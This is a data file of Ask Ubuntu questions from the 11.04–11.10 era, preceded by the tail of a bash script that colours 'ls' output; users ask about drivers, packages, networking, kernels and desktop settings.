; 31m '' local emg= '' \033 [ 1 ; 32m '' local emy= '' \033 [ 1 ; 33m '' local emb= '' \033 [ 1 ; 34m '' local emm= '' \033 [ 1 ; 35m '' local emc= '' \033 [ 1 ; 36m '' local emw= '' \033 [ 1 ; 37m '' # background colors local bgk= '' \033 [ 40m '' local bgr= '' \033 [ 41m '' local bgg= '' \033 [ 42m '' local bgy= '' \033 [ 43m '' local bgb= '' \033 [ 44m '' local bgm= '' \033 [ 45m '' local bgc= '' \033 [ 46m '' local bgw= '' \033 [ 47m '' # do magic here ls -la | sed `` s/^\ ( [ d- ] \ ) \ ( [ r- ] \ ) \ ( [ w- ] \ ) \ ( [ x- ] \ ) \ ( [ r- ] \ ) \ ( [ w- ] \ ) \ ( [ x- ] \ ) \ ( [ r- ] \ ) \ ( [ w- ] \ ) \ ( [ x- ] \ ) /`echo -e \ '' $ emg\1 $ emy\2\3\4 $ emr\5\6\7 $ emc\8\9\10 $ none\ '' `/ '' } domagic # to run : save as domagic.sh and run with : bash domagic.sh
71128	how do i install handbrake ?	i 've added the ppa here https : //edge.launchpad.net/~stebbins/+archive/handbrake-releases when i run sudo apt-get update , the software sources are n't found . i figured maybe they had n't updated their repos to the newest version , so i changed the distro in software center to natty . now when i try to install handbrake-gtk i get the message handbrake-gtk : depends : libnotify1 ( > = 0.5.0 ) but it is not installable depends : libnotify1-gtk2.10 but it is not installable it looks like the only packages starting with libnotify are libnotify0.4-cil libnotify-bin libnotify-dev libnotify4 libnotify-cil-dev libnotify-doc the only relevant one seemed like libnotify4 , which is already installed . the cli version installs fine . how can i install handbrake ?
71133	icons and nautilius windows looks strange	desktop icons and nautilus window ( all file browsing ) looks colorless and low resolution . `` nautilius -q '' provides a remedy . however , i need to do it after each boot ... problem appeared after updating to 11.10 . i have nvidia-graphics if it matters ... many thanks in advance ! please let me know if i should provide any log . do n't know where to start , due to noob !
71134	how do i stop my fans from going crazy after resuming after suspending ?	i 'm kinda new to ubuntu , and i have an hp envy 14-2020nr . the computer has hybrid graphics , and since ubuntu does n't yet handle them very well i 've been using vga_switcheroo to disable the discrete graphics card ( amd radeon hd 6600m series ) at boot . anyways with the discrete graphics card disabled if i suspend my computer , when i wake it back up the computer 's fan goes to maximum and wo n't stop until i restart . how can i go about fixing this so i can use the suspend without having to restart afterwards ? i have tried turning back on the discrete graphics card before suspending and that seems to work . so is there a way to get my computer to turn it on before suspending , but then turning it back off when it resumes ? any ways at solving this would be much appreciated . thanks .
71135	is there an install dvd with multiple interface choices ?	i would like to be able to burn a single dvd containing multiple interfaces . the ubuntu live cd image is 700mb so there should be loads of room . maybe the languages packages could be put on it as well ? i think mandriva could do this . you basically chose which interface you wanted when you installed . is there any ubuntu live dvd with that ?
71136	why does my computer ( quad core , 4gb ram ) slow to a grinding halt when ubuntuone is syncing	why does my computer ( quad core , 4gb ram ) slow to a grinding halt when ubuntuone is syncing ! ! ! i 'm on 11.04 and getting really fed up with it ... i ca n't do anything when it syncs !
71137	how can i get an epson tx560wd scanner working ?	i have a epson tx560wd , the printer works perfectly on ubuntu 11.10 , but the scanner do n't . i installed xsane and xsane-extras , but the scanner it 's not recognized either way . when i open xsane the following message shows up : `` no device available '' . according to sane project the epson tx560wd is tagged as `` complete '' , so it should work ( i guess so ) . http : //www.sane-project.org/lists/sane-backends-external.html also my ubuntu 11.10 is 64 bits . what i should do , to make the scanner work ? tried installing iscan but that does n't work .
71139	how to downgrade the kernel on 11.10	because of the high power usage i 'd like to downgrade my kernel in ubuntu 11.10 to the version used in 10.10 or 11.04 . how can i do that and wo n't it cause any problems ?
71142	youtube videos ( 1080p ) very laggy	ca n't play 1080p videos on youtube but they play flawlessly on windows 7 . any suggestions/help ? cpu : amd turion 64 x2 1.8ghz , 2gb ram and ati hd 3200 .
71143	how can i change the color of each bar in a bar graph using open office ?	i 'm doing an assignment and it involved using color and frequency and i ca n't figure out how to individually change the color of each bar in a bar graph ... please help me !
71146	admin users on an ubuntu core installation	i installed ubuntu core using these instructions , and added a user . but when i try to add the user to the admin group , it says the group does not exist . what do i do ? ps i had to install sudo , however it made no difference .
71149	wacom bamboo capture cth470l pen and touch does n't work	i bought a wacom bamboo capture , it lights up , and shows in lsusb but it is n't working , i read some topics here but do n't get any luck : / ps : sorry about my english i 'm brazilian .
71154	how to create a recovery partition in memory	how can i create a recovery partition in memory as an option when booting the pc so that i can check all partitions including the system one that typically loads ubuntu . this way i can fsck for example the partition that is normally running ubuntu but without having it running it at that moment . the recovery partition would have access to some tools to check the disck , memory , etc . is this doable ? just to clarify with the whole recovery partition , i would boot the pc and load the normal grub menu but it would have an additional option to load some kind of image that would load into memory and from there it would start the system ( everything running from memory ) . so i could for example , do a fsck on all hard drives and do other checking while taking the advantage of the increased speed of using the memory to host the recovery system ( without using the hard drives ) .
71159	network manager says `` device not managed ''	i used to be able to share my network connection by editing the auto eth0 to share with other computers in the ipv4 section and now i upgraded my laptop to 11.10 . now are there no wired connections in the network manager . when i click my connections applet at the top of the tray it also says wired device not managed ! when i type ifconfig -a daniella @ daniella-1001ha : ~ $ ifconfig -a eth0 link encap : ethernet hwaddr 90 : e6 : ba:83 : d6 : fc up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:45 eth0 : avahi link encap : ethernet hwaddr 90 : e6 : ba:83 : d6 : fc inet addr:169.254.13.40 bcast:169.254.255.255 mask:255.255.0.0 up broadcast multicast mtu:1500 metric:1 interrupt:45 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) wlan0 link encap : ethernet hwaddr 00:25 : d3:90:43:41 inet addr:192.168.0.6 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :225 : d3ff : fe90:4341/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:12881 errors:0 dropped:0 overruns:0 frame:0 tx packets:12867 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:8851081 ( 8.8 mb ) tx bytes:2343199 ( 2.3 mb )
71166	grab handles appearing randomly , causes erratic mouse behavior	i did a clean install of ubuntu 11.10 recently . every so often , grab handles will appear on the active window . sometimes they simply disappear after a few seconds without causing me any problems . other times , the mouse appears already grabbing the window ( like when you grab the center handle ) and the mouse and the window will shake erratically for a few moments . in this case , i lose control over the mouse until the grab handles fade out a few seconds later . this occurs multiple times a day , maybe once every hour or two . the oddest thing about it is that i do n't have grab handles enabled : for reference , this is an asus g53sw laptop with a core i7 , geforce gtx 460m and 6 gb of ram . any ideas ?
71168	applications icon in the dash keeps disappearing	inside the dash there are some links at the bottom - home , applications , files , music . the applications icon keeps disappearing , and then reappearing after . no particular event or key press . what 's wrong ? error confirmed and still occurring intermittently with all updates applied as of 21 jan '12 two screenshots above are < 1 min apart , nothing else running .
71178	how do i disable the `` available for purchase '' list on the music lens ?	i have no intentions in buying music , so i would like to disable it !
71180	ca n't detect wireless connections with an atheros ar2413 on an acer aspire 3630	this is a new installation of ubuntu 11.10 on an acer aspire 3630 . the cd drive is broken so i had to install ubuntu over network ( and i suspect it did not install all the packages in the normal installation ) . the problem is that ubuntu does not list the available wireless connections and i ca n't manually connect to my home wifi . i have tried a lot of things and this is all the info i have : the wireless card is an ar2413 . the physical button to switch on/off the wireless does not work . i am using the ath5k driver . during boot i get the following message : addrconf ( netdev_up ) : wlan0 : link is not ready iwconfig lo no wireless extensions . eth0 no wireless extensions . wlan0 ieee 802.11bg essid : off/any mode : managed access point : not-associated tx-power=20 dbm retry long limit:7 rts thr : off fragment thr : off power management : off lshw *-network:1 description : wireless interface product : ar2413 802.11bg nic vendor : atheros communications inc. physical id : b bus info : pci @ 0000:00:0b.0 logical name : wlan0 version : 01 serial : 00:16 : ce:17 : eb:4c width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=ath5k driverversion=3.0.0-12-generic firmware=n/a latency=168 link=no maxlatency=28 mingnt=10 multicast=yes wireless=ieee 802.11bg resources : irq:17 memory : e2010000-e201ffff rfkill list all rfkill list all 0 : phy0 : wireless lan soft blocked : no hard blocked : no update i discovered that the problem is that , when i boot ubuntu the wireless is disabled . if i manually enable it it works perfectly ... until the next time i restart the computer . these are the commands i use to enable the wireless card : sudo rmmod -f ath5k sudo rfkill unblock all sudo modprobe ath5k
71181	gnome tweak tool does not show extensions	i can not use the user the gnome-shell-extensions-user-theme because there is no button on the tweak tool to enable extensions ! i 've completely uninstalled and reinstalled the gnome-tweak-tool , no difference . any suggestions ? bruce .
71183	sshfs someuser @ 192.168.0.100 : / ~/documents/somefolder makes somefolder an unreadable file	i installed fuse , and added myself to fuse usergroup . the directory somefolder is already created . when i run the command , it asks for the remote password , and if i enter it correctly , prints nothing else , and seems like it worked . however , i can not access somefolder , and in krusader somefolder looks like a file now , not like a directory . i can not even change permissions on somefolder anymore , not even with sudo ... how to make it work ?
71187	blogger or wordpress , which has better integration with ubuntu ?	about to start my own blog about ubuntu on my fresh 11.10 install . i would like to know the pros and cons of using either platform in a ubuntu environment .
71188	how to bypass/remove/disable the untrusted package authentication	first the image : then me saying `` say what ! ! .. how the..what the.. ? ? '' . basically i am stunned . how can i disable/bypass/remove/explode the option for the untrusted packages not letting me install them . i mean it is the ppa for wine . that 's like 99 % official ^^ . anyway the question is regarding all ppa 's that have the untrusted flag in them .
71189	how do i boot the live cd on a macbook pro ?	trying to install ubuntu-11.10-64bit-mac on a macbook pro . but i can not get the live cd to load . 'c ' does not work 'cmd ' does not work 'opt ' no opt key cd is not corrupt and burnt using the correct iso , all checked . installed perfectly on my acer pc ... . god i hate apple macs ! mac currently has ubuntu 10.10 32bit , but i get issues with the touchpad , i read ubuntu 11.10-mac version resolves these issues , hence the attempted re-installation ... i do not have any mac os installed in this pc only ubuntu 10.10 . when i press 'alt ' the cd does not appear in the list only my hdd , yes my cd is working fine .
71190	can not login after removing password from user account	so i removed the password of my user account and restarted . when i tried to login , a black screen showed up and took me immediately back to the login screen . running ubuntu 11.04 via livecd , i found the /home folder is owned by root , no idea if it has to do with that . i also checked the option to encrypt the user folder at installation , propably was n't the best idea . i can login with ctrl + alt + f1 , when i then try to start x , it gives me the error message , that .xauthority is missing . now i wonder how i 'd create that file , when i ca n't access my /home/user folder , because it is encrypted . it also tells me on login that i should run encryptfs-mount-private .
71191	what is the 'bizcom ' logo that 's appeared following my upgrade ?	i upgraded to 11.10 , and now i notice that when i shut down , i get a weird `` bizcom '' logo with a backwards copyright symbol : at first this made me think i had installed some dubious hacked package , but i have n't found any . then i thought it might be related to my newish asus monitor , and something the upgrade triggered so that it goes into its own shutdown mode . this does n't seem to be the case either ( even though ubuntu now identifies the monitor by oem name that 's new to me , `` ancor communications '' . ) . where is this `` bizcom '' image coming from , and how do i get rid of it ?
71193	trouble authenticating and with groups . phantom duplicate user account ?	i 'm sometimes having trouble authenticating and it seems i 'm no longer a member of the 'admin ' group . or i am ... . but i have two user accounts with the same name and only one of them is ... or something equally weird ... when i start my terminal , the command prompt says i 'm myself ( user 'casey ' ) : casey @ netbook : ~ $ when i run the groups command without a user argument ... ( `` man groups '' sez `` if no username is specified , [ groups are printed ] for the current process '' ) ... it says i 'm a member of only two groups : 'casey ' and 'lock ' ! casey @ netbook : ~ $ groups casey lock if i do specify my username , i suddenly see i 'm a member of many groups : casey @ netbook : ~ $ groups casey casey : casey adm dialout cdrom floppy audio dip video plugdev fuse lpadmin admin sambashare lock these are the same groups i see if i su to my own username , and again query groups with no arguments . notice that the prompt username stays the same : casey @ netbook : ~ $ su casey casey @ netbook : ~ $ groups casey adm dialout cdrom floppy audio dip video plugdev fuse lpadmin admin sambashare lock but if i exit again : casey @ netbook : ~ $ exit exit casey @ netbook : ~ $ groups casey lock output of users : casey @ netbook : ~ $ users casey casey example of trouble authenticating : casey @ netbook : ~ $ gksudo gedit /etc/passwd this yielded the following error dialog : failed to run gedit '/etc/passwd ' as user root . the underlying authorization mechanism ( sudo ) does not allow you to run this program . contact the system administrator . continued : casey @ netbook : ~ $ su root root @ netbook : /home/casey # gedit /etc/passwd ( gedit:19566 ) : eggsmclient-warning ** : failed to connect to the session manager : none of the authentication protocols specified are supported ** glib-gio : error : /build/buildd/glib2.0-2.28.6/./gio/gdbusconnection.c:2279 : initable_init : assertion failed : ( connection- > initialization_error == null ) aborted root @ netbook : /home/casey # su casey casey @ netbook : ~ $ gksudo gedit /etc/passwd at this point it launched properly . /- : background info : i 'm using natty narwhal 11.04 . all was normal until the other day when i tried to install `` vodafone mobile connect '' , which complained i was n't a member of groups 'dialout ' and 'lock ' . i added myself , but it still said the same thing . i copied and pasted a proposed solution from a web-page which google translate had mischievously inserted extra spaces into : sudo chmod 0660 / etc / ppp / pap-secrets / etc / ppp / chap-secrets . : :forehead-slap : : this screwed up permissions non-recursively ( thank goodness for that ! ) on the root directory of my file system . it was an easy fix with another chmod from my live usb stick . i do n't think this is related to my current problem , but worth mentioning just in case . incidentally , i ca n't seem to remove the 'lock ' group from the one 'casey ' account , nor add it to the other .
71196	what can i do to prevent ubuntu from overheating my notebook ?	i have an easynote tj65 ( 2.1 ghz dual core with geforce gt240m ) running ubuntu 11.10 and windows 7 in dual-boot-mode . while windows 7 does n't have any comparable issues , ubuntu is making my notebook warmer and warmer once the cpu-usage of all processes together gets higher than 50-60 percent , which happens as soon as i do anything more than simple browsing , e.g . starting and running banshee . after starting with no other processes running and ( cpu-usage : ~1 % ) the temperature of both cores is at 61 degrees . once it got to 50 percent cpu usage it rises to around almost 90 for both cores ( gpu rises to the same level according to psensors ) . sensors tells me that 98 is the critical temperature for my cpu model and i think around 90 is far too close , especially if i 'm not doing anything special . the system crashes pretty quickly once my average cpu usage gets beyond 60 % . it also seems like the fan is not as loud as at system startup as it could be in windows while playing graphic-intensive games for example . and yes : i cleaned my fan ! and no : i ca n't change anything in my bios regarding the fan or cpu . i hope you can help me -- like this , it is impossible to use the ubuntu notebook as a productive system .
71199	manually created .deb , how do i upload to a ppa ?	i have a manually created .deb , and i 'd like to upload it to a ppa . my question is as follows : is that possible ? and if so , how do i do that ?
71202	enabling multitouch , right-click , screen-keyboard , pitch-zoom , etc . on tablet	i want to install ubuntu 11.10 on my tablet ( msi windpad 110w , currently running windows 8 ) , but the touch-controls are not as it should be : multitouch does n't work . which software/settings do i need ? right click does n't work . ( holding the finger on the screen ) the performance of the screen keyboard is very bad . scrolling of websites etc . does n't work pitch-to-zoom does n't work need help please !
71208	how can i prioritize wireless networks with network-manager	mostly i use my laptop in an environment where different wireless networks are available and i would like to preferably connect to one of those and only fall back to the other one if that one is not available . is there any way of prioritizing which wireless networks network-manager preferably connects to ? the only workaround i found so far was unchecking connect automatically in the options and re-enabling it when my preferred network is not available .
71211	how to use cpulimit on all cron jobs ?	using ubuntu server an aws micro box , so if the cpu utilization spikes aws will virtually kill the cpu for the box ( for about 30 sec ) . nice does n't solve the problem , but cpulimit does ( i use it in my own cpu intensive cron jobs ) . some system default cron jobs are triggering the aws cpu limiter . there are about 15 default cron job scripts , rather than trying to re-write every one to use cpulimit , is there a way i can use cpulimit to limit the cpu of all cron jobs ( that would have to include the sub processes that are spawned by the various scripts ) ?
71217	how i can install the epson tx 135 ?	how i can install ? whenever i connect , it tells me not found the appropriate driver , any help is welcome , thanks . 多como puedo instalarlo ? cada vez que conecto la impresora me dice que no encuentra el driver apropiado para esta.. en fedora 15 me dice lo mismo ... fue mi razon para cambiarme a ubuntu . cualquier ayuda es bienvenida , gracias .
71218	issue with terminal after ubuntu 11.10 install	when i try to install a program in terminal it runs for a while and then a box come up that says `` configuring ttf-mscorefonts-installer '' and asks me to hit 'ok ' . but i can not hit 'ok ' or make the box go away at all . if i try to close terminal it says there are still processes running . if i close it anyway i can no longer use terminal . i read on a forum that i should just delete ttf-mscorefonts-installer , but it wo n't let me have permission . this is just a desktop pc in my home . so , how can i fix this problem ? and how can i give myself permission to delete files ?
71220	installing any nvidia driver on a nvidia geforce 310m causes laptop to not boot	i am using an asus u35jc with a nvidia geforce 310 m graphics card . system info says that my graphics card is unknown . when i install any of two additional drivers and run sudo nvidia-xconfig* and reboot , after grub it just stops loading the operating system . however , i can still login via tty1 and change /etc/x11/xorg.conf and restore the backup . ( before i figured this out i reinstalled ubuntu every time . ) thanks in advance to anyone who views this . * : got the idea from : https : //answers.launchpad.net/ubuntu/+source/xserver-xorg-video-nv/+question/163996
71221	does lubuntu 11.10 have a indicator ?	will touchpad-indicator work when enabled on lubuntu 11.10 's indicator ?
71225	is there a gnome-shell auto-move-windows equivalent in unity/compiz ?	i want that when a certain application is started that it automatically moves to workspace 2 ... i already tried the compiz window placement plugin but this only works for start-up applications . in gnome-shell there is the extension auto-move-windows but for unity/compiz i ca n't find an equivalent . can you please help ?
71230	how do i revert old theme customizations after they re-appeared in ubuntu 11.10 ?	the first thing i noticed after upgrading from 11.04 to 11.10 is that my wallpaper changed to the one i used to have ages ago - probably before i upgraded from 10.10 to 11.04 . which is not a big deal , of course , but : my daughter used to experiment with gnome themes in her account on the same machine - you know , bright-blue window backgrounds with yellow text etc . later she changed the settings to something more usable . after the upgrade to oneiric , the gnome theme reverted to blue backgrounds with yellow text and i can find no way to reset it . i installed the `` advanced settings '' tool and can change the theme there , but it looks like most of the themes fall back to some default settings for window and text colors - i.e . window decorations and other elements change , but the blue and yellow `` shine through '' the theme . previously it was possible to edit the defaults but with the `` streamlined '' gnome 3 ui i ca n't find where it is done . the only theme which override the blue background is high contrast theme - but it 's just too ugly to be used . can somebody explain what caused this `` time machine '' effect - the settings in question were last used many months ago and then changed via standard gnome means . how do i remove the theme customisations and roll back to the stock standard theme ?
71233	using nx with unity in 11.10	i 'm trying to use nx to login remotely to my desktop . but when i do , because of unity i get the following screen : it looks like all i can do is access the file browser from here . i tried following the instructions in this post , but they do n't work ( presumably because i do n't have the necessary gnome stuff ) . how do i launch the unity-2d `` session '' on 11.10 ?
71234	how to make software under mono and wine use the bookmarks of nautilus when opening files	when opening files in some ubuntu native software , there is an interface that can use the bookmarks of nautilus . but when using software run under mono or wine , there seems no apparent way to use nautilus bookmarks . i wonder how to use nautilus bookmarks when opening files under mono or wine software ? thanks and regards !
71235	`` unknown filesystem unionfs '' although all packages and modules are installed	i 'm trying to mount a unionfs file system in fstab ( as one of the steps in this guide ) , with the following line : unionfs /usr unionfs nodev , noatime , dirs=/.filesystems/usr/overlay=ro : /usr=rw 0 0 i 've installed the package unionfs-fuse and added unionfs to /etc/modules , but when trying to mount -a i still get an error saying mount : unknown file system type : unionfs what am i doing wrong here ?
71236	how do i disable the f10 ( application menu ) keybinding in ubuntu 11.10 ?	identical to : deactivate f1 and f10 keybindings ? but these instructions no longer apply to 11.10 . there 's no longer a mapping for f10 . i need access to f10 for chrome 's javascript debugger .
71240	how to remove icons/shortcuts from unity menu ?	i have installed chromium and tweet deck on it ( trough chrome store ) , now i uninstalled tweet deck and after that chromium , the problem is , when i installed tweet deck it asked me if i want to create a shortcut to it and i chose yes . now that both are uninstalled the tweet deck icon still appears on unity menu over internet . i tried to remove the icon from the menu but i ca n't figure out how to do this . it should be a simple thing to do , but is giving me headaches : p what i have to do to remove the shortcut and possible junk files from chromium ? also my ubuntu version is 11.10 x64 . ( sorry if i write something wrong ) thanks in advance .
71241	how to interpolate a variable immediately after a ` $ ` or `\ $ ` in the bash prompt ?	i am using this function : function test ( ) { local var= '' hello '' ps1= '' \u\ $ $ var '' } the output i am trying to get from the function is john $ hello . but what i get is just john . if i add a space before $ var , then i do get close to what i want - but i do not want the space in there . is it possible to do what i want without having that space ?
71242	set the default brightness level in ubuntu 11.10	in 11.10 the way to set the brightness has changed . how can i set my default brightness because my laptop starts all the way down when i log in currently ?
71243	how can i get in contact with an ubuntu developer to help with a problem ?	i have an ubuntu problem and after posting it on here i got no answers . i need this problem fixed and i would like to get in email or twitter contact with an ubuntu expert .
71252	slow wired internet connection on realtek rtl8168-8111 ( rev 6 )	i keep on seeing issues people are having with their wireless . i am having an issue with being wired into my router . i installed ubuntu 11.10 the other day , on my custom pc . the motherboard i have installed on this pc is an asus p8h61-m . the issue i am having is with my speed . i have a dual boot , windows 7 and the new ubuntu . on my windows install i am getting test speeds from speakeasy at 17mbps and actual downloads around 2-3mb/s . with ubuntu , i am getting test speeds from speakeasy at 1.14mbps and actual downloads around 60kb/s . i have disabled ipv6 and am no using googledns for my dns , but it has n't resolved the issue . i have scanned my router ( wrt54gs linksys ) to disable ipv6 connections , and i am not seeing any option for that . i can not figure out why i am getting such sluggish internet connection . any help to resolve would be great ! i performed an iconfig -a with these results : mark @ mark-asus : ~ $ ifconfig -a eth0 link encap : ethernet hwaddr f4:6d:04 : d1:2c:4e inet addr:192.168.1.103 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :f66d:4ff : fed1:2c4e/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:21888 errors:0 dropped:21888 overruns:0 frame:21888 tx packets:21068 errors:0 dropped:90 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:26348337 ( 26.3 mb ) tx bytes:2217140 ( 2.2 mb ) interrupt:46 base address:0xc000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:7 errors:0 dropped:0 overruns:0 frame:0 tx packets:7 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:952 ( 952.0 b ) tx bytes:952 ( 952.0 b ) my specs are : mark @ mark-asus : ~ $ sudo lspci -nn 04:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 06 ) 06:00.0 pci bridge [ 0604 ] : asmedia technology inc. device [ 1b21:1080 ] ( rev 01 ) udev information : kernel [ 11.351405 ] add /devices/pci0000:00/0000:00:1c.2/0000:04:00.0/net/eth0 ( net ) udev_log=3 action=add devpath=/devices/pci0000:00/0000:00:1c.2/0000:04:00.0/net/eth0 subsystem=net interface=eth0 ifindex=2 seqnum=1542 udev [ 11.363905 ] add /devices/pci0000:00/0000:00:1c.2/0000:04:00.0/net/eth0 ( net ) udev_log=3 action=add devpath=/devices/pci0000:00/0000:00:1c.2/0000:04:00.0/net/eth0 subsystem=net interface=eth0 ifindex=2 seqnum=1542 id_vendor_from_database=realtek semiconductor co. , ltd. id_model_from_database=rtl8111/8168b pci express gigabit ethernet controller id_bus=pci id_vendor_id=0x10ec id_model_id=0x8168 id_mm_candidate=1 dmesg information : [ 2.855982 ] r8169 gigabit ethernet driver 2.3lk-napi loaded [ 2.856366 ] r8169 0000:04:00.0 : eth0 : rtl8168b/8111b at 0xffffc9000064c000 , f4:6d:04 : d1:2c:4e , xid 0c900800 irq 46 [ 12.540956 ] r8169 0000:04:00.0 : eth0 : link down [ 12.540961 ] r8169 0000:04:00.0 : eth0 : link down [ 12.541173 ] addrconf ( netdev_up ) : eth0 : link is not ready i took out a lot of information that did not pertain to eth0 , because the previous edits would n't save . if i need any more information , let me know . i would love to get this resolved . the other issue i am noticing is sometimes my connection disconnects all together , for about a minute , then it reconnects .
71254	wunderlist 1.2.4 does n't work even through terminal	i downloaded the tgz then unpacked it , double clicked the wunderlist icon but no response , i ran the terminal and wrote the command mentioned here how do i install wunderlist ? sudo ln -s /usr/lib/x86_64-linux-gnu/libffi.so.6 /usr/lib/x86_64-linux-gnu/libffi.so.5 and it returned `` ln `` invalid option -- / '' i have ubuntu 11.10 thank you
71271	ruby gems error with atomictv	i 've been trying to run atomictv on my 10.04 install , but i 've had some ruby issues that i 'm having trouble parsing and have n't been able to find help with via google . i installed the ruby gems packages , and libopenssl-ruby , which sounded like it might have been the problem , but does n't seem to have changed . trying to run atomictv throws this error : /usr/local/lib/site_ruby/1.9.1/rubygems/custom_require.rb:36 : in `require ' : no such file to load -- net/https ( loaderror ) from /usr/local/lib/site_ruby/1.9.1/rubygems/custom_require.rb:36 : in `require' from /usr/lib/ruby/gems/1.9.1/gems/httparty-0.8.1/lib/httparty.rb:3 : in ` < top ( required ) > ' from /usr/local/lib/site_ruby/1.9.1/rubygems/custom_require.rb:36 : in `require' from /usr/local/lib/site_ruby/1.9.1/rubygems/custom_require.rb:36 : in `require' from /usr/lib/ruby/gems/1.9.1/gems/tvdb_party-0.6.0/lib/tvdb_party.rb:2 : in ` < top ( required ) > ' from /usr/local/lib/site_ruby/1.9.1/rubygems/custom_require.rb:36 : in `require' from /usr/local/lib/site_ruby/1.9.1/rubygems/custom_require.rb:36 : in `require' from /usr/lib/ruby/gems/1.9.1/gems/atomictv-1.0.2/lib/atomictv.rb:7 : in ` < top ( required ) > ' from /usr/local/lib/site_ruby/1.9.1/rubygems/custom_require.rb:36 : in `require' from /usr/local/lib/site_ruby/1.9.1/rubygems/custom_require.rb:36 : in `require' from /usr/lib/ruby/gems/1.9.1/gems/atomictv-1.0.2/bin/atomictv:3 : in ` < top ( required ) > ' from /usr/bin/atomictv:19 : in `load' from /usr/bin/atomictv:19 : in ` < main > ' anybody have any suggestions ? alternatively , does anybody know any good command line software that can pull tags from thetvdb ?
71278	wiping `` swap '' partition	i am trying to install ubuntu 11.10 . i partitioned between windows and ubuntu , with some free space left . i did not designate a `` swap partition . '' when i start installation , it gets stuck on this message : `` wiping swap space for security . '' since i do not have a swap space , this is not applicable . i have tried restarting the installation , to no avail . help ?
71283	where is the gnome-shell shutdown options	my girlfriend is using gnome-shell ( that traitor ! ! ^^ ) and she wants to know where is the options for shutdown like in unity ( another point for me and unity hehe ) . how can i add/find this option to help her . note - if the option is not available then thats life . what can we do ?
71290	can not startx , protocol not found	good afternoon , i can not startx , i get an error `` protocol not found '' . ( ubuntu 11.10 x86_64 install was messed up after libjpeg was removed , had to reinstall ubuntu-desktop ) is there anything i can do to get this working again ? thanks for all suggestions , alec taylor
71291	changed motherboard , esata does n't hot-swap	recently my file server suffered a hardware failure ; long story short , i just finished putting a brand new motherboard , cpu , and ram into it . and happily everything is working fine -- except the esata . specifically , the esata port does n't seem to recognize when i unplug my drive , or plug in a different one . on the previous hardware , i could unplug the drive and watch its entry in e.g . /dev/disk/by-id/ disappear , and i could plug in a different drive and watch a new entry appear in the same directory . now , however , i unplug the drive , and the entry does n't disappear . i plug in a different drive , and there 's no new entry , only the old one . strangely , though , fdisk -l reads the new drive just fine ; the issue , though , is that i have a backup script that relies on those drive ids to find and mount the ( encrypted ) external backup drive . the new motherboard is an asrock 880g pro3 sporting an amd athlon ii x2 250 . i have turned on ahci mode for the sata controller , and i 've tried the `` amd ahci bios '' ( although i have no idea what this actually is ) both enabled and disabled , to no effect . is there some recongifuration i need to do to the kernel , or to the package , to make it properly recognize these signals on the new hardware ? or some setting that i 'm missing in the bios or something ?
71292	right bottom corner textbox in desktop ; what 's it for ?	a text box appears on the right bottom corner when typing on the desktop . what is the box used for and what 's it called ?
71298	how to uninstall old versions of the kernel ?	how to uninstall old versions of the kernel ? the grub menu is full with old kernel entries , when i need to boot windows i have to press down key multiple times and i hate doing that , so please help me . ubuntu version : 10.04 thank you in advance . sorry for my english .
71299	where has grub 's chain.c32 gone ? i can only find chain.mod	i am trying to set up a chainload from my arch 's syslinux bootloader - but i ca n't find chain.c32 under /boot/grub in my ubuntu installation . all i can find is chain.mod , so i thought i 'd try using that in case it was the same file with a new extension , but the bootloader complained about it being the wrong file type . all of the guides i have found have told me i need to copy the .c32 into my syslinux folder ... help please ? switching which hdd is plugged in each time i want to boot a different system is soooo 2000s ... ( and thoroughly inconvenient )
71304	how to install and run windows xp / vista in kvm headless server ?	i have a headless ubuntu 11.10 server running with kmv installed . i was able to install and run several vms with the vmbuilder . however , now i want to install and run several windows ( xp & win7 ) vms in this server as it is necessary for some of the users . my problems are ; how do i install windows guests in a headless server from *.iso files locating in a different place ? ( provided that the host containing *.iso files has apache web server running thus it is possible to give .iso file location as http : //someserver/path/file.iso ) unlike linux/unix , windows installation is graphical . therefore , how do i transfer those graphical outputs to a remote machine ( i.e . to the controlling host ) ? ? how do i give access to clients to those installed windows vms in a similar way in ltsp ( linux terminal server project ) ? ? ? your help with ideas/commands/tutorials are very much appreciated . thank you in advanced .
71305	i 'm using unity 3d but my top bar is n't translucent ?	i 'm using unity 3d right now and my hardware configuration allows it , but the top bar is n't translucent as i see it in other systems , why is that ? how can i make it translucent ? thanks .
71306	can i replace the xscreensaver lock dialog with the version from gnome-screensaver	im using ubuntu 11.10 , with xfce and xscreensaver , the xscreensaver configurator is nice but the unlock dialog is ugly . i tried gnome-screensaver , but it only gives me a blank screen . so , can i have the gnome-screensaver unlock dialog with xscreensaver
